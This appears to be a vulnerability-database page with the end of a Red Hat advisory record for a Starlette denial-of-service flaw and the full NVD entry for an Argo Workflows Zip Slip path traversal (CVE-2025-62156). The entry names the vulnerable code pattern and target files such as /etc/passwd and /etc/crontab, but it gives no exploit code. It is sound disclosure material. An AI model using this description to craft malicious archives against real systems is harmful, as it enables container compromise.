"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette DoS via Range header merging"
}
]
}
FKIE_CVE-2025-62156
Vulnerability from fkie_nvd - Published: 2025-10-14 15:16 - Updated: 2025-11-17 14:27
Severity ?
8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| argo_workflows_project | argo_workflows | * | |
| argo_workflows_project | argo_workflows | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:argo_workflows_project:argo_workflows:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "A2C2FFAE-0EDF-4A73-A22A-6390FBF91C1C",
"versionEndExcluding": "3.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:argo_workflows_project:argo_workflows:*:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "1E594D88-EEA6-4DAB-BE26-583215BAC976",
"versionEndExcluding": "3.7.3",
"versionStartIncluding": "3.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue."
}
],
"id": "CVE-2025-62156",
"lastModified": "2025-11-17T14:27:17.267",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-10-14T15:16:12.683",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…